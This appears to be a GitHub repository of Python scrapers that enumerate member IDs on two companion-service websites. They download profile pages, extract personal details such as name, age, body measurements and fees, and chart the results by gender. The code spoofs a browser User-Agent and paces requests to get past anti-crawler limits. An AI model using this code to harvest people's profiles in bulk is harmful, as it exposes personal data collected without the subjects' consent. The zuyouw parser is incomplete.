https://github.com/luozhouyang/datas
d69132ae0968008374d57920ed02184cb39ed23e
5fae91c5bd65cb88f0b2f7ace33a7c3875c3c75b
181371dcb2947f42e686ed79f8a540053e29c2cc
refs/heads/master
2023-06-24T16:26:57.360983
2018-06-20T12:37:53
2018-06-20T12:37:53
135,167,523
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7615411281585693, "alphanum_fraction": 0.7788962125778198, "avg_line_length": 30.326086044311523, "blob_id": "e17014d74eebacfb2faf8cbf0e1ada278ad7f2e6", "content_id": "99d66fef11caaf5878590996d191aa8a64f982d0", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 4817, "license_type": "permissive", "max_line_length": 132, "num_lines": 92, "path": "/README.md", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "# datas\n爬取某些网站数据,并且做可视化处理。\n\n## 前提条件\n使用该爬虫,需要满足以下条件:\n* 安装python3环境,推荐3.5\n* 安装Pycharm Community(可选) \n\n### Python安装\nWindows: \n请到[Python3.5 Download Page](https://www.python.org/downloads/release/python-350/)下载,下载完成后,双击进行安装。全部选项默认即可。 \n然后设置系统环境变量,将安装的Python路径加到`$PATH`环境变量即可,参看[Windows 设置 Python环境变量](https://jingyan.baidu.com/article/48206aeafdcf2a216ad6b316.html)。 \n\nLinux(Ubuntu为例):\n```bash\nsudo apt install python3.5\n``` \n\nMac OS:\n```bash\nbrew install python3\n``` \n\n### Pycharm Community安装\n进入[Pycharm Community Download](https://www.jetbrains.com/pycharm/)下载,默认安装即可。\n\n## 使用\n首先需要下载本仓库代码,有以下两种方式:\n* 到项目主页下载ZIP压缩文件,推荐不熟悉Git的用户\n* 使用Git克隆,命令如下\n\n```bash\ncd $YOUR_WORK_DIR\ngit clone https://github.com/luozhouyang/datas\n```\n下载后解压(如果是下载ZIP压缩文件),然后使用你喜欢的文本编辑器或者IDE打开项目即可。推荐Pycharm Community。\n\n然后按照Pycharm的提示安装依赖库。 \n\n该代码主要有以下几个步骤:\n* 下载html页面(保存数据源,不是很必要)\n* 解析html文件,提取有效信息,保存为CSV文件\n* 进一步处理CSV文件,提取出想要的数据,输出到EXCEL表格\n* 将感兴趣的内容,绘制图表\n\n进一步,你可以使用EXCEL进一步将输出的数据进行可视化。\n\n### HTML页面的下载\n网站一般会有反爬虫策略,常用的办法是控制访问的频率,同时使用多个IP。为了简单,本项目没有使用IP池,只是控制了访问频率。 \n下载HTML页面的代码位于[bajiuwang/html_downloader.py](bajiuwang/html_downloader.py)。\n本爬虫目前只支持`url+$ID`形式的网站页面下载,当然要想支持其他类型的URL很简单。 \n举个例子,如果某网站的地址规律是`http://www.555.com?id=$ID`这种形式,那么本项目适合你,只需要给在Downloader的__init__函数里面,给`base_url`参数设置为`http://www.55.com?id=`。 \n为了避免不必要的网络访问,你需要确定一个合理的`$ID`范围。在Downloader的__init__函数的`ranges`参数设置好即可。 \n\n准备好之后,即可运行`html_downloader.py`程序,下载程序启动后,会定期保存当前的`$ID`值,当程序异常退出的时候,下次启动程序,会从该`$ID`开始继续下载,即类似断点功能。\n记录该`$ID`的文件在程序当前目录,名为的`record.txt`文件。 \n下载的HTML页面默认保存在本项目的根目录下的文件夹,具体目录你可以自己设置。\n\n### HTML页面的解析\n下载好数据之后,即可启动解析程序,提取出你想要的信息。按照[bajiuwang/patterns.py](bajiuwang/patterns.py)的格式添加需要解析的内容。 \n运行[bajiuwang/html_parser.py](bajiuwang/html_parser.py)文件,即可开始解析。 \n如果你设置了其他的下载目录,在改文件的`file`一行改成你自定义的目录即可。 \n本步骤生成的CSV文件位于前一步骤的相同目录,文件名为`0_info.csv`,你可以在`html_parser.py`文件中自行更改文件名。 \n\n### 根据CSV文件进行可视化 \n根据前面步骤生成的CSV文件,可以进一步可视化。使用`matplotlib`和`PrettyTable`两个库进行图的绘制和表格的输出。 \n\n要生成图表,只需要运行[bajiuwang/csv_analyzer.py](bajiuwang/csv_analyzer.py)文件即可。\n生成的图片保存在当前目录的`images`文件夹内。输出的表,直接打印在终端。 \n\n同时也会将数据输出到EXCEL表格文件,保存在当前目录下的`datas.xlsx`文件,方便用户处理。\n\n### 使用EXCEL处理输出文件 \n上一个步骤输出的`datas.xlsx`文件,使用强大的Microsoft Excel软件打开,可以用来制作各种类型的图表。\n\n## matlibplot中文显示的问题 \n参考 [matlibplot显示中文](https://monkey0105.github.io/2016/10/10/matplotlib-chinese-display/) \n\n## License\n Copyright 2018 luozhouyang.\n\n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this file except in compliance with the License.\n You may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License." }, { "alpha_fraction": 0.5089853405952454, "alphanum_fraction": 0.5255736708641052, "avg_line_length": 38.315216064453125, "blob_id": "9c98a01d830b42bc9fbe0b0d4a881362cbb72a66", "content_id": "5394f134d868f1331784ee8583947d81a6ca67f6", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3617, "license_type": "permissive", "max_line_length": 116, "num_lines": 92, "path": "/bajiuwang/html_downloader.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import time\nimport argparse\nimport os\n\nfrom urllib import request\n\n\nclass Downloader:\n\n def __init__(self, base_url, record_file, save_folder, ranges):\n cur_path = os.path.dirname(__file__)\n self.record_file = record_file\n if not self.record_file:\n self.record_file = os.path.join(cur_path, \"record.txt\")\n self.save_folder = save_folder\n if not save_folder:\n self.save_folder = os.path.join(cur_path, \"download\")\n if not base_url:\n raise TypeError(\"base url is NoneType\")\n self.base_url = base_url\n if ranges and len(ranges) == 2:\n self.start_id = int(ranges[0])\n self.end_id = int(ranges[1])\n else:\n self.start_id = 700000\n self.end_id = 800000\n\n def download(self):\n start_id = self._read_start_id()\n print(\"Start id: %d\" % start_id)\n success_count = 0\n prev_err_id = start_id\n continuous_err_count = 0\n for id in range(start_id, self.end_id):\n try:\n time.sleep(1)\n resp = request.urlopen(self.base_url + str(id), timeout=2.0)\n if resp.getcode() != 200:\n continue\n page = resp.read().decode('gbk')\n if not os.path.exists(self.save_folder):\n os.makedirs(self.save_folder)\n file = self.save_folder + \"/\" + str(id) + '.txt'\n with open(file, mode='wt', encoding='utf-8', buffering=8192) as f:\n f.write(page)\n except Exception as e:\n print(\"Exception occurs in %d\" % id)\n if id == prev_err_id + 1:\n continuous_err_count += 1\n else:\n continuous_err_count = 0\n if continuous_err_count == 50:\n print(\"Continuous error count: %d\" % continuous_err_count)\n # print(\"Stop program\")\n # break\n time.sleep(60 * 60)\n self.download()\n prev_err_id = id\n continue\n else:\n print(str(id))\n success_count += 1\n if success_count % 100 == 0:\n self._save_start_id(str(id))\n\n def _read_start_id(self):\n id = self.start_id\n if not os.path.exists(self.record_file):\n return id\n with open(self.record_file, mode=\"rt\", encoding=\"utf8\") as fin:\n id = fin.readline()\n if id:\n id = int(id)\n return id\n\n def _save_start_id(self, id):\n with open(self.record_file, mode=\"wt\", encoding=\"utf8\") as fout:\n fout.write(id)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--base_url\", type=str, default=\"http://www.89yn.com/member.asp?id=\")\n parser.add_argument(\"--record_file\", type=str, default=\"/home/allen/PycharmProjects/datas/bajiuwang/record.txt\",\n help=\"A file to save latest download id.\")\n parser.add_argument(\"--save_folder\", type=str, default=\"/home/allen/PycharmProjects/datas/www89yn_data\",\n help=\"A folder to save download files.\")\n parser.add_argument(\"--range\", type=str, default=\"700000,800000\", help=\"Comma-separated list of ids.\")\n args, _ = parser.parse_known_args()\n downloader = Downloader(base_url=args.base_url, record_file=args.record_file, save_folder=args.save_folder,\n ranges=args.range.split(\",\"))\n downloader.download()\n" }, { "alpha_fraction": 0.7311828136444092, "alphanum_fraction": 0.7580645084381104, "avg_line_length": 45.75, "blob_id": "7e351c96dcddb02f3f55e7240ce17581adbe6075", "content_id": "a9708eb898d52cea4095ba2e55fff2e593a3e92b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 186, "license_type": "permissive", "max_line_length": 70, "num_lines": 4, "path": "/bajiuwang/html_downloader.sh", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\npython3 html_downloader.py \\\n --save_folder=/home/allen/PycharmProjects/datas/www89yn_data \\\n --record_file=/home/allen/PycharmProjects/datas/www89yn/record.txt" }, { "alpha_fraction": 0.524210512638092, "alphanum_fraction": 0.5799999833106995, "avg_line_length": 31.758621215820312, "blob_id": "e5bffca0b7ec9f20dde68e54d0e06fba344b49e2", "content_id": "1161ed275b0da79c3d3b4845baf212ebc8ea8a44", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 950, "license_type": "permissive", "max_line_length": 125, "num_lines": 29, "path": "/zuyouw/zuyouw_html_download.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import time\nfrom urllib import request\n\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept': 'text/html',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',\n 'DNT': '1',\n}\nfor id in range(162315, 167900):\n try:\n time.sleep(1)\n url = 'http://www.zuyouw.com/home/' + str(id)\n print(url)\n req = request.Request(url=url, headers=headers)\n resp = request.urlopen(req, timeout=2.0)\n if resp.getcode() != 200:\n continue\n page = resp.read().decode('utf-8')\n file = '/home/allen/PycharmProjects/datas/zuyouw_data/' + str(id) + '.html'\n with open(file, mode='wt', encoding='utf-8', buffering=8192) as f:\n f.write(page)\n except Exception as e:\n print(e)\n continue\n else:\n print(str(id))\n" }, { "alpha_fraction": 0.5127528309822083, "alphanum_fraction": 0.5341542363166809, "avg_line_length": 34.9052619934082, "blob_id": "5ed0cf203fed853b5b5d4e25de6d5057537c78bb", "content_id": "d874594176226aa15daa4871232fbbd31d469917", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3419, "license_type": "permissive", "max_line_length": 106, "num_lines": 95, "path": "/bajiuwang/csv_xlsx_saver.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "from openpyxl import Workbook\nimport os\n\n\nclass XLSXSaver:\n\n def __init__(self, filename, ages, services, educations, origins, cities):\n self.filename = os.path.join(os.path.dirname(__file__), \"xlsx\", filename)\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _save_xlsx_horizontal(wb, title, index, c0, c1, c2):\n sheet = wb.create_sheet(title=title, index=index)\n row = ['']\n men_row = ['男']\n women_row = ['女']\n for k, _ in c0.items():\n row.append(k)\n if k in c1.keys():\n v0 = int(c1[k])\n else:\n v0 = 0\n men_row.append(v0)\n if k in c2.keys():\n v1 = int(c2[k])\n else:\n v1 = 0\n women_row.append(v1)\n sheet.append(row)\n sheet.append(men_row)\n sheet.append(women_row)\n\n @staticmethod\n def _save_xlsx_vertical(wb, title, index, c0, c1, c2):\n sheet = wb.create_sheet(title, index)\n row = ['', '男', '女']\n sheet.append(row)\n for k, _ in c0.items():\n if k in c1.keys():\n v_men = int(c1[k])\n else:\n v_men = 0\n if k in c2.keys():\n v_women = int(c2[k])\n else:\n v_women = 0\n row = [k, v_men, v_women]\n sheet.append(row)\n\n def _save_xlsx(self, wb, title, index, c0, c1, c2):\n self._save_xlsx_horizontal(wb, title + \"_1\", index, c0, c1, c2)\n self._save_xlsx_vertical(wb, title + \"_2\", index + 5, c0, c1, c2)\n\n def _save_age_xlsx(self, wb):\n self._save_xlsx(wb, title='age', index=0,\n c0=self.ages_all_dict, c1=self.ages_men_dict, c2=self.ages_women_dict)\n\n def _save_service_type_xlsx(self, wb):\n self._save_xlsx(wb, title='service_type', index=1,\n c0=self.services_all_dict, c1=self.services_men_dict, c2=self.services_women_dict)\n\n def _save_edu_xlsx(self, wb):\n self._save_xlsx(wb, title='education', index=2,\n c0=self.edus_all_dict, c1=self.edus_men_dict, c2=self.edus_women_dict)\n\n def _save_origin_xlsx(self, wb):\n self._save_xlsx(wb, title='origin', index=3,\n c0=self.origins_all_dict, c1=self.origins_men_dict, c2=self.origins_women_dict)\n\n def _save_lives_xlsx(self, wb):\n self._save_xlsx(wb, title='lives_in', index=4,\n c0=self.cities_all_dict, c1=self.cities_men_dict, c2=self.cities_women_dict)\n\n def save_to_xlsx(self):\n wb = Workbook()\n self._save_age_xlsx(wb)\n self._save_service_type_xlsx(wb)\n self._save_edu_xlsx(wb)\n self._save_origin_xlsx(wb)\n self._save_lives_xlsx(wb)\n wb.save(self.filename)\n" }, { "alpha_fraction": 0.4817112982273102, "alphanum_fraction": 0.49118223786354065, "avg_line_length": 34.195404052734375, "blob_id": "0f4e8f83b75cdc7ac01e517c960531830d820c4f", "content_id": "afc0fc89d91477f7d9b2f390be60cd824bb798e4", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3296, "license_type": "permissive", "max_line_length": 109, "num_lines": 87, "path": "/zuyouw/zuyouw_html_parser.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nheadline = \"身  份,用 户 名,用户 ID,性  别,婚姻状态,年  龄,学  历,身  高,月薪收入,星  座,职  业,所在地区,自我介绍,\" \\\n \"个性描述,相貌自评,体  重,体  型,魅力部位,发  型,发  色,脸  型,租友类型,方便联系时间,\" \\\n \"提供的线上服务,收  费,提供的线下租友服务,收  费\"\n\n\nclass Item:\n\n def __init__(self, identify, name, id, gender, marriage, age, education, height, incoming, constellation,\n occupational, area, charecter, look, weight, charm, hair, hair_color, face, rent_type,\n time, service_online, pay_online, service_offline, pay_offline, self_intro=\"\"):\n self.identify = identify\n self.name = name\n self.id = id\n self.gender = gender\n self.marriage = marriage\n self.age = age\n self.education = education\n self.height = height\n self.incoming = incoming\n self.constellation = constellation\n self.occupational = occupational\n self.area = area\n self.charecter = charecter\n self.look = look\n self.weight = weight\n self.charm = charm\n self.hair = hair\n self.hair_color = hair_color\n self.face = face\n self.rent_type = rent_type\n self.time = time\n self.service_online = service_online\n self.pay_online = pay_online\n self.service_offline = service_offline\n self.pay_offline = pay_offline\n self.intro = self_intro\n\n def to_csv_line(self):\n return self.identify+\",\"\n\n\nfiledir = \"/home/allen/PycharmProjects/datas/zuyouw_data/\"\nfiles = os.listdir(filedir)\nfor f in files:\n if not f.endswith(\".html\"):\n continue\n with open(filedir + f, mode=\"rt\", encoding=\"utf-8\", buffering=8192) as fin:\n item = Item()\n while True:\n position = 0\n line = fin.readline()\n if not line:\n break\n if \"infolist\" in line:\n if position == 0:\n def parse(line):\n line = line.split(\":\")[1]\n return line[:line.index(\"<\")]\n\n\n position += 1\n lines = []\n for _ in range(12):\n lines.append(fin.readline())\n item.identify = parse(lines[0])\n item.name = parse(lines[1])\n item.id = parse(lines[2])\n item.gender = parse(lines[3])\n item.marriage = parse(lines[4])\n item.age = parse(lines[5])\n item.education = parse(lines[6])\n item.height = parse(lines[7])\n item.incoming = parse(lines[8])\n item.constellation = parse(lines[9])\n item.occupational = parse(lines[10])\n item.area = parse(lines[11])\n continue\n elif position == 1:\n position += 1\n continue\n elif position == 2:\n position += 1\n continue\n else:\n pass\n" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6625000238418579, "avg_line_length": 27, "blob_id": "28a715162c556bd876f8b10f924d7ff1f9e72e01", "content_id": "aa3cc793a0fb4fb01a662f3df0cb606c7c7c1e98", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 560, "license_type": "permissive", "max_line_length": 125, "num_lines": 20, "path": "/zuyouw/zuyou77.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import bs4\nfrom urllib import request\n\nheaders = {\n 'Connection': 'keep-alive',\n 'Cache-Control': 'max-age=0',\n 'Accept': 'text/html',\n 'X-Requested-With': 'XMLHttpRequest',\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.89 Safari/537.36',\n 'DNT': '1',\n}\nurl = \"http://wxapp.zuyou77.com/web\"\nreq = request.Request(url=url, headers=headers)\nresp = request.urlopen(req, timeout=2)\nhtml = resp.read().decode('utf8')\nprint(html)\nbs = bs4.BeautifulSoup(html)\n\nfor e in bs.div:\n print(e)\n" }, { "alpha_fraction": 0.75, "alphanum_fraction": 0.7661290168762207, "avg_line_length": 30, "blob_id": "6f10e3e1f97845250a0231d33784baaa8c0a4ead", "content_id": "30fce9d5ac4a494cad623e5899a34fa8e66c31f5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 124, "license_type": "permissive", "max_line_length": 76, "num_lines": 4, "path": "/install_requirements.sh", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "#!/usr/bin/env bash\nsource venv2/bin/activate\n\npip3 install -i https://pypi.tuna.tsinghua.edu.cn/simple -r requirements.txt\n" }, { "alpha_fraction": 0.5560046434402466, "alphanum_fraction": 0.5560046434402466, "avg_line_length": 45.81081008911133, "blob_id": "2b238607e147f1cf974a918d18fb58a7af6c50b5", "content_id": "77304a4e62273770336f8994d50368423d768a18", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1732, "license_type": "permissive", "max_line_length": 103, "num_lines": 37, "path": "/bajiuwang/item.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "class Item:\n\n def __init__(self, name=\"\", id=\"\", gender=\"\", age=\"\", birth=\"\", constellation=\"\",\n height=\"\", weight=\"\", size=\"\", degree=\"\", marriage=\"\", occupational=\"\",\n lives=\"\", origin=\"\", area=\"\", payment=\"\", serve_time=\"\", language=\"\",\n serve_type=\"\", hobbits=\"\", characteristic=\"\", message=\"\"):\n self.name = name\n self.id = id\n self.gender = gender\n self.age = age\n self.birth = birth\n self.constellation = constellation\n self.height = height\n self.weight = weight\n self.size = size\n self.degree = degree\n self.marriage = marriage\n self.occupational = occupational\n self.lives = lives\n self.origin = origin\n self.area = area\n self.payment = payment\n self.serve_time = serve_time\n self.language = language\n self.serve_type = serve_type\n self.hobbits = hobbits\n self.character = characteristic\n self.message = message\n\n def __str__(self):\n return \"name={},id={},gender={},age={},birth={},constellation={},height={},weight={},\" \\\n \"size={},degree={},marriage={},occupational={},lives={},origin={},area={},payment={},\" \\\n \"serve_time={},language={},serve_type={},hobbits={},characteristic={},message={}\" \\\n .format(self.name, self.id, self.gender, self.age, self.birth, self.constellation,\n self.height, self.weight, self.size, self.degree, self.marriage, self.occupational,\n self.lives, self.origin, self.area, self.payment, self.serve_time, self.language,\n self.serve_type, self.hobbits, self.character, self.message)\n" }, { "alpha_fraction": 0.6007533073425293, "alphanum_fraction": 0.6059321761131287, "avg_line_length": 38.70093536376953, "blob_id": "22163b5de43fcbba892c9cd278a42cff51c1a82a", "content_id": "6f779a540efb7f69f74cb88e7694cbc2a0f4aed8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4248, "license_type": "permissive", "max_line_length": 118, "num_lines": 107, "path": "/bajiuwang/csv_table_printer.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "from prettytable import PrettyTable\n\n\nclass TablePrinter:\n\n def __init__(self, ages, services, educations, origins, cities):\n self.ages_all_dict = ages[0]\n self.ages_men_dict = ages[1]\n self.ages_women_dict = ages[2]\n self.services_all_dict = services[0]\n self.services_men_dict = services[1]\n self.services_women_dict = services[2]\n self.edus_all_dict = educations[0]\n self.edus_men_dict = educations[1]\n self.edus_women_dict = educations[2]\n self.origins_all_dict = origins[0]\n self.origins_men_dict = origins[1]\n self.origins_women_dict = origins[2]\n self.cities_all_dict = cities[0]\n self.cities_men_dict = cities[1]\n self.cities_women_dict = cities[2]\n\n @staticmethod\n def _total_value(values):\n total = 0\n for v in values:\n total += int(v)\n return total\n\n def print_age(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Age distribution table\", self.ages_all_dict)\n\n def print_age_men(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Male age distribution table\", self.ages_men_dict)\n\n def print_age_women(self):\n self._print_table([\"Age\", \"Count\", \"Percent\"], \"Female age distribution table\", self.ages_women_dict)\n\n def _print_table(self, columns, header, collection):\n print(\"=====\" + header)\n table = PrettyTable(columns)\n table.align[columns[0]] = \"l\"\n table.padding_width = 1\n total = self._total_value(collection.values())\n for k, v in collection.items():\n p = \"%.2f\" % (int(v) / total * 100)\n table.add_row([k, v, p])\n print(table)\n print(\"Total: %d\" % total)\n\n def print_service_types(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Service types distribution table\", self.services_all_dict)\n\n def print_service_types_men(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Male service types distribution table\",\n self.services_men_dict)\n\n def print_service_types_women(self):\n self._print_table([\"Type\", \"Count\", \"Percent\"], \"Female service types distribution table\",\n self.services_women_dict)\n\n def print_edu(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Education distribution table\",\n collection=self.edus_all_dict)\n\n def print_edu_men(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Male education distribution table\",\n collection=self.edus_men_dict)\n\n def print_edu_women(self):\n self._print_table(columns=[\"Education\", \"Count\", \"Percent\"], header=\"Female education distribution table\",\n collection=self.edus_women_dict)\n\n def print_origin(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Origin distribution table\", self.origins_all_dict)\n\n def print_origin_men(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Male origin distribution table\", self.origins_men_dict)\n\n def print_origin_women(self):\n self._print_table([\"Origin\", \"Count\", \"Percent\"], \"Female origin distribution table\", self.origins_women_dict)\n\n def print_cities(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Cities distribution table\", self.cities_all_dict)\n\n def print_cities_men(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Male cities distribution table\", self.cities_men_dict)\n\n def print_cities_women(self):\n self._print_table([\"City\", \"Count\", \"Percent\"], \"Female cities distribution table\", self.cities_women_dict)\n\n def print_tables(self):\n self.print_age()\n self.print_age_men()\n self.print_age_women()\n self.print_service_types()\n self.print_service_types_men()\n self.print_service_types_women()\n self.print_edu()\n self.print_edu_men()\n self.print_edu_women()\n self.print_origin()\n self.print_origin_men()\n self.print_origin_women()\n self.print_cities()\n self.print_cities_men()\n self.print_cities_women()\n" }, { "alpha_fraction": 0.507164478302002, "alphanum_fraction": 0.5140262246131897, "avg_line_length": 38.959678649902344, "blob_id": "83e2cf83226bee52237864db666cf44961d8cbab", "content_id": "c69c4638b28d90c3938b0741385a7dedf690a4ef", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5077, "license_type": "permissive", "max_line_length": 116, "num_lines": 124, "path": "/bajiuwang/html_parser.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import os\n\nfrom bajiuwang.patterns import Patterns\nfrom bajiuwang.item import Item\n\nfiles = os.listdir(\"/home/allen/PycharmProjects/datas/www89yn_data\")\ninfos = []\n\n\ndef _parse_line(line, type=1):\n contents = line.split(\":\")\n if len(contents) != 2:\n return \"\"\n if type == 1:\n result = Patterns.PATTERN_TYPE_1.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n elif type == 2:\n result = Patterns.PATTERN_TYPE_ID.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n elif type == 3:\n result = Patterns.PATTERN_TYPE_PAYMENT.sub(\"\", contents[1])\n return result.replace(\",\", \";\").replace(\"\\s+\", \" \").strip()\n return \"\"\n\n\nfor f in files:\n if not f.endswith(\".txt\"):\n continue\n p = \"/home/allen/PycharmProjects/datas/www89yn_data/\" + f\n if not os.path.exists(p):\n continue\n with open(p, mode=\"rt\", encoding=\"utf-8\") as fin:\n item = Item()\n for l in fin:\n if not l.strip():\n continue\n if Patterns.PATTERN_NAME.findall(l):\n item.name = _parse_line(l)\n continue\n if Patterns.PATTERN_ID.findall(l):\n item.id = _parse_line(l, type=2)\n continue\n if Patterns.PATTERN_GENDER.findall(l):\n item.gender = _parse_line(l)\n continue\n if Patterns.PATTERN_AGE.findall(l):\n item.age = _parse_line(l)\n continue\n if Patterns.PATTERN_BIRTH.findall(l):\n item.birth = _parse_line(l)\n continue\n if Patterns.PATTERN_CONSTELLATION.findall(l):\n item.constellation = _parse_line(l)\n continue\n if Patterns.PATTERN_HEIGHT.findall(l):\n item.height = _parse_line(l)\n continue\n if Patterns.PATTERN_WEIGHT.findall(l):\n item.weight = _parse_line(l)\n continue\n if Patterns.PATTERN_SIZE.findall(l):\n item.size = _parse_line(l)\n continue\n if Patterns.PATTERN_DEGREE.findall(l):\n item.degree = _parse_line(l)\n continue\n if Patterns.PATTERN_MARRIAGE.findall(l):\n item.marriage = _parse_line(l)\n continue\n if Patterns.PATTERN_OCCUPATIONAL.findall(l):\n item.occupational = _parse_line(l)\n continue\n if Patterns.PATTERN_LIVES.findall(l):\n item.lives = _parse_line(l)\n continue\n if Patterns.PATTERN_ORIGIN.findall(l):\n item.origin = _parse_line(l)\n continue\n if Patterns.PATTERN_AREA.findall(l):\n item.area = _parse_line(l)\n continue\n if Patterns.PATTERN_PAYMENT.findall(l):\n item.payment = _parse_line(l, type=3)\n continue\n if Patterns.PATTERN_SERVE_TIME.findall(l):\n item.serve_time = _parse_line(l)\n continue\n if Patterns.PATTERN_LANGUAGE.findall(l):\n item.language = _parse_line(l)\n continue\n if Patterns.PATTERN_SERVICE_TYPE_PROVIDED.findall(l) or Patterns.PATTERN_SERVICE_TYPE_NEEDED.findall(l):\n item.serve_type = _parse_line(l)\n continue\n if Patterns.PATTERN_HOBBITS.findall(l):\n item.hobbits = _parse_line(l)\n continue\n if Patterns.PATTERN_CHARACTERISTIC.findall(l):\n item.character = _parse_line(l)\n continue\n if Patterns.PATTERN_MESSAGE.findall(l):\n item.message = _parse_line(l)\n continue\n if item.id:\n # print(count)\n infos.append(item)\noutdir = \"/home/allen/PycharmProjects/datas/www89yn_data/\"\nif not os.path.exists(outdir):\n os.mkdir(outdir)\noutfile = outdir + '0_info_20180609.csv'\nwith open(outfile, mode=\"wt\", encoding=\"utf-8\", buffering=8192) as f:\n f.write(\"姓名, Id, 性别, 年龄, 生日, 星座, 身高, 体重, 体型, 学位, 婚姻,\" +\n \"职业, 居住城市, 籍贯, 可去地区, 是否收费, 服务时间, 使用语种, 提供服务,\" +\n \"兴趣爱好, 性格类型, 心情留言\\n\")\n count = 0\n for item in infos:\n count += 1\n print(count)\n line = item.name + \",\" + item.id + \",\" + item.gender + \",\" + item.age + \",\" + item.birth + \",\" + \\\n item.constellation + \",\" + item.height + \",\" + item.weight + \",\" + item.size + \",\" + \\\n item.degree + \",\" + item.marriage + \",\" + item.occupational + \",\" + item.lives + \",\" + \\\n item.origin + \",\" + item.area + \",\" + item.payment + \",\" + item.serve_time + \",\" + \\\n item.language + \",\" + item.serve_type + \",\" + item.hobbits + \",\" + item.character + \",\" + \\\n item.message + \"\\n\"\n f.write(line)\n" }, { "alpha_fraction": 0.5893805027008057, "alphanum_fraction": 0.5936577916145325, "avg_line_length": 40.5950927734375, "blob_id": "b789c3078fcf47e316f9f638c97b1a23fedf918f", "content_id": "c7623f640008585a9f546033f4657f6a03b59fea", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6810, "license_type": "permissive", "max_line_length": 104, "num_lines": 163, "path": "/bajiuwang/csv_analyzer.py", "repo_name": "luozhouyang/datas", "src_encoding": "UTF-8", "text": "import csv\nfrom collections import Counter, OrderedDict\n\nimport jieba\n\nfrom .csv_image_generator import ImageGenerator\nfrom .csv_table_printer import TablePrinter\nfrom .csv_xlsx_saver import XLSXSaver\n\njieba.load_userdict(\"/home/allen/PycharmProjects/datas/jieba_dict.txt\")\n\n\nclass Analyzer:\n\n def __init__(self, csv_file):\n self.csv_file = csv_file\n self.has_parse_file = False\n self.ages_dict = None\n self.ages_men_dict = None\n self.ages_women_dict = None\n self.genders_dict = None\n self.educations_dict = None\n self.educations_men_dict = None\n self.educations_women_dict = None\n self.service_types_dict = None\n self.service_types_men_dict = None\n self.service_types_women_dict = None\n self.origin_dict = None\n self.origin_men_dict = None\n self.origin_women_dict = None\n self.lives_dict = None\n self.lives_men_dict = None\n self.lives_women_dict = None\n\n def parse_csv_file(self):\n ages = []\n ages_men = []\n ages_women = []\n genders = []\n educations = []\n educations_men = []\n educations_women = []\n origins = []\n origins_men = []\n 